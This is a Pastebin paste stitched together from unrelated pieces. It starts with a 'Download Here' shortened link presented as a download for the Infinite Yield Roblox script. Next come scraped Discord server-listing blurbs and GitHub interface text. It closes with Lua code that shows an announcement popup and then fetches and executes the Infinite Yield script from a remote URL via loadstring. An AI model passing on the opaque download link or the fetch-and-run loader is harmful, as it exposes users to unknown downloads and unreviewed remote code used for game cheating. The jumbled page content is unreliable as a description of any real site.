Advertisement
Guest User

Infinite yield website

a guest
Nov 10th, 2024
487
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.78 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/5hcwp8n4 (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Infinite Yield
  10. Official server for the Infinite Yield Commands script.
  11. About Server
  12. Official server for the Infinite Yield Commands script.
  13. Recent Posts
  14. Latest Server News and Events
  15. Use 'Join Server' above to join this community.
  16. Similar Servers
  17. Tech Support! Are you looking for support when it comes to running video game servers? What about being a server owner or admin? Would you like to learn tricks and tips to grow your population? Join today to have the experience of becoming a better server admin!
  18. Team Val is a programming support server designed for discord.js, discord.py, web design, and other languages. Click here to learn more.
  19. This is the official support server for the discord bot, Aiden's Assistant. The #1 discord assistant for you and your server. Ranging from amazing staff to the friendly community.
  20. ? Our server was developed in order to divulge resources and provide support in the area of technology and development of game servers. ✨ Here you will find what you want !
  21. Unreal Dev Community, We Talk Games and Films Development. Unreal, Unity and Cry Engine. Maya 3DsMax, Blender, 3D, Art, Code, CPP, C# ..
  22. If you're looking for support, tutorials or even a friendly chat, you should join Programmers Den. We offer our expertise round the clock to help you become a better developer, we welcome Novices and Professionals alike.
  23. Servidor de Configuração de FiveM Aqui nos ajudamos a desenvolver servidores de FiveM e etc. - Scripts Únicos Free - Bases Free - Scripts Pagos - Bases Pagas
  24. Our Discord server is focused on providing free support and resources for those interested in developing on the Roblox platform. Whether you're just starting out or are an experienced developer, we have something for everyone. Our community is composed of a diverse group of individuals who are passionate about creating and sharing their work on Roblox. We offer a variety of free resources to help you improve your skills, such as tutorials, documentation, and sample code. We also have a dedicated section for sharing and receiving feedback on your projects, as well as a section for troubleshooting and debugging. Join us to improve your skills, share your work, get feedback, and connect with a community of like-minded individuals, all for free.
  25. Need Discord Me support? Join the Discord Me Discord server discord.me/discordme
  26. Discord Me is not affiliated with Discord. We're a platform to help Discord server managers grow their communities.
  27. This site uses affiliate links. We may receive commission if you purchase products through our links.
  28. Name already in use
  29. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  30. Infinity-Yield-Project / Infinity Yield Script
  31. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  32. 1 contributor
  33. Users who have contributed to this file
  34.  
  35. Open with Desktop
  36. View raw
  37. Copy raw contents Copy raw contents Copy raw contents
  38. This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
  39. local AnnGUI = Instance.new("Frame") local background = Instance.new("Frame") local TextBox = Instance.new("TextLabel") local shadow = Instance.new("Frame") local PopupText = Instance.new("TextLabel") local Exit = Instance.new("ImageButton") screenGui = Instance.new("ScreenGui",game.CoreGui) AnnGUI.Name = 'Boomer' AnnGUI.Parent = screenGui AnnGUI.Active = true AnnGUI.BackgroundTransparency = 1 AnnGUI.Position = UDim2.new(0.5, -180, 0, -400) AnnGUI.Size = UDim2.new(0, 360, 0, 20) AnnGUI.ZIndex = 4 background.Name = "background" background.Parent = AnnGUI background.BackgroundColor3 = Color3.fromRGB(36, 36, 37) background.BorderSizePixel = 0 background.Position = UDim2.new(0, 0, 0, 20) background.Size = UDim2.new(0, 360, 0, 135) TextBox.Parent = background TextBox.BackgroundTransparency = 1 TextBox.Position = UDim2.new(0.017, 0, 0.06, 0) TextBox.Size = UDim2.new(0, 348, 0, 120) TextBox.Font = Enum.Font.SourceSans TextBox.TextSize = 18 TextBox.TextWrapped = true TextBox.Text = 'Please use the new Infinite Yield loadstring. You can find it in the Discord.\n\ndiscord.io/infiniteyield\n\nYou will now be re-directed to the new loadstring.' TextBox.TextColor3 = Color3.new(1, 1, 1) TextBox.TextXAlignment = Enum.TextXAlignment.Left TextBox.TextYAlignment = Enum.TextYAlignment.Top shadow.Name = "shadow" shadow.Parent = AnnGUI shadow.BackgroundColor3 = Color3.fromRGB(46, 46, 47) shadow.BorderSizePixel = 0 shadow.Size = UDim2.new(0, 360, 0, 20) shadow.ZIndex = 4 PopupText.Name = "PopupText" PopupText.Parent = shadow PopupText.BackgroundTransparency = 1 PopupText.Position = UDim2.new(0, 51, 0, 0) PopupText.Size = UDim2.new(0.76, -16, 0.95, 0) PopupText.ZIndex = 4 PopupText.Font = Enum.Font.SourceSans PopupText.TextSize = 14 PopupText.Text = "Server Announcement" PopupText.TextColor3 = Color3.new(1, 1, 1) PopupText.TextWrapped = true Exit.Name = "Exit" Exit.Parent = shadow Exit.BackgroundTransparency = 1 Exit.Size = UDim2.new(0, 20, 0, 20) Exit.ZIndex = 4 Exit.Image = "rbxassetid://2132544126" wait(1) AnnGUI:TweenPosition(UDim2.new(0.5, -180, 0, 150), "InOut", "Quart", 0.5, true, nil) Exit.MouseButton1Click:Connect(function() AnnGUI:TweenPosition(UDim2.new(0.5, -180, 0, -400), "InOut", "Quart", 0.5, true, nil) wait(0.6) AnnGUI:Destroy() end) wait(5) loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement